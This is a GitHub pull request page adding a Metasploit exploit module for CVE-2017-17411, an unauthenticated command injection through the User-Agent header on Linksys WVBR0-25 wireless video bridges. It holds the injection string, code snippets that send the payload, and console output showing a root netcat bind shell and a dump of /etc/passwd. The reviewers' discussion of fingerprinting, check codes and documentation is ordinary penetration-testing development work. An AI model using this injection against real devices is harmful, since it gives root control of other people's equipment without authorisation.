-
Notifications
You must be signed in to change notification settings - Fork 14.3k
Adds exploit module for CVE-2017-17411 #9336
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41. Example console output: ``` msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info Name: Linksys WVBR0-25 User-Agent Command Execution Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth Platform: Unix Privileged: Yes License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2017-12-13 Provided by: HeadlessZeke Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload information: Space: 1024 Description: The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability. References: http://cvedetails.com/cve/2017-17411/ http://www.zerodayinitiative.com/advisories/ZDI-17-973 https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat) msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat payload => cmd/unix/bind_netcat msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104 RHOST => 10.0.0.104 msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit [*] 10.0.0.104:80 - Trying to access the device ... [*] Started bind handler [*] 10.0.0.104:80 - Exploiting... [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600 id uid=0(root) gid=0(root) ^C Abort session 1? [y/N] y [*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic payload => cmd/unix/generic msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd cmd => cat /etc/passwd msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit [*] 10.0.0.104:80 - Trying to access the device ... [*] 10.0.0.104:80 - Exploiting... [+] 10.0.0.104:80 - Command sent successfully [*] 10.0.0.104:80 - Command output: root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga [*] Exploit completed, but no session was created. msf exploit(linksys_wvbr0_user_agent_exec_noauth) > ```
Adds exploit module for CVE-2017-17411
| 'method' => 'GET', | ||
| 'uri' => '/' | ||
| }) | ||
| if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/ # version < 1.0.41 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
False positives can be here. Let's setup a simple http server for it
$ cat index.html
Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 Firmware Builddate: 2014-08-26 18:05 Product.type: production Linux: Linux version 2.6.30 (root@build-vm) (gcc version 4.2.1 (ARC_2.3)) #1 Tue Aug 26 10:47:37 PDT 2014 Board: titans
$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Try to check the vulnerability status as following:
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show options
Module options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RPORT 8080
RPORT => 8080
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > check
[+] 127.0.0.1:8080 The target is vulnerable.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hmm...that is true, but then again I can't think of a way to check this that can't also be faked in the same way...
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I think @nixawk is suggesting a more unique string to fingerprint?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Also, it should return CheckCode::Appears if it's just a version check.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Oh that’s an idea. If I have it echo back a random string at runtime, then it wouldn’t be possible to predict the response. I’ll do that instead.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah, that's the kind of check that would warrant CheckCode::Vulnerable. You even do it below with cmd/unix/generic. :)
| return Exploit::CheckCode::Unknown | ||
| end | ||
|
|
||
| puts res.body.to_s |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
- puts is not recommended, and (vprint_* / print_*) can be used.
- If status is vulnerable, we should not output http response directly in check function.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Gah! This was a debug message from my testing. Will remove it.
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| require 'msf/core' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please remove require 'msf/core'.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Oh ok, removing.
| [ | ||
| ['CVE', '2017-17411'], | ||
| ['ZDI', '17-973'], | ||
| ['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair'] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This was a good read. Didn't realize it was you, @headlesszeke!
| ## | ||
|
|
||
| class MetasploitModule < Msf::Exploit::Remote | ||
| Rank = NormalRanking |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Command injection that might be ExcellentRanking.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
heh, well if you say so ;)
| 'method' => 'GET', | ||
| 'uri' => '/', | ||
| 'headers' => { | ||
| 'User-Agent' => "\"; printf \"#{check_str}" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can use the top-level key agent instead of setting it in headers manually.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
will do
| res = send_request_raw({ | ||
| 'method' => 'GET', | ||
| 'uri' => '/', | ||
| 'agent' => "\"; printf \"#{check_str}" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
echo <"string"> == printf <"string\n" >.
- echo may be more stable.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I thought printf was the more reliable of the two. I used it so I wouldn’t have to deal with any newlines being fed to the md5sum along with the string, but I can change it if desired.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Since this is a device and not Joe Bob's random PHP app, and you have the device, you can check. It's probably BusyBox. If it has both, use either.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Oh yeah, it definitely has both. I think I’m just gonna leave it as is for simplicity.
|
I'm happy to handle this instead of just shepherding it if @headlesszeke is willing to test. :) If you could add some quick docs as per https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation, that'd be fantastic. You can find examples under |
|
Sorry for the delay over the holiday, doc file added (hopefully up to the usual standards) |
| @@ -0,0 +1,49 @@ | |||
| ## Vulnerable Application | |||
|
|
|||
| This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/). | |||
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
the link doesn't link to anything specifically, and I dont see linksys or WVBR0-25 on the page. Can we find a better link?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah, I kinda figured this question would come up. That page has a link to the wvbr0's manual under the wireless video bridge section and is the closest thing to a vendor product page I can find. I didn't link directly to the manual itself because it seemed in poor form to link to a pdf from metasploit. ;)
As I see it, there are two other options if we don't want that: I can either link to a 3rd party site that has a better description for the device but is not official (like https://www.solidsignal.com/pview.asp?p=wvb for example) or remove the link altogether...
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The page is fine I think if you were to say something like "(under the title foobar)" directing to where it was. I think adding an "unofficial" link is also a stellar idea. This way since either may change we have at least a base reference to go off of
| 2. Start msfconsole. | ||
| 3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth``` | ||
| 4. Do: ```set payload cmd/unix/bind_netcat``` | ||
| 5. Do: ```set RHOST <ip>``` |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
change to square brackets
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Will do.
|
Docs look pretty good, 2 minor nit picks, but over all nice |
|
Can you do one last test, @headlesszeke? I'll ship it after. |
|
Just tested the module again for fun after making the doc changes. Everything still working beautifully. Thanks for the help! |
Release NotesThis new exploit module can achieve RCE on Linksys WVBR0-25 (wireless video bridge) devices running certain versions of firmware. |
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to
";<payload> #. This can be verified against WVBR0-25 devices running firmware < 1.0.41.Example console output: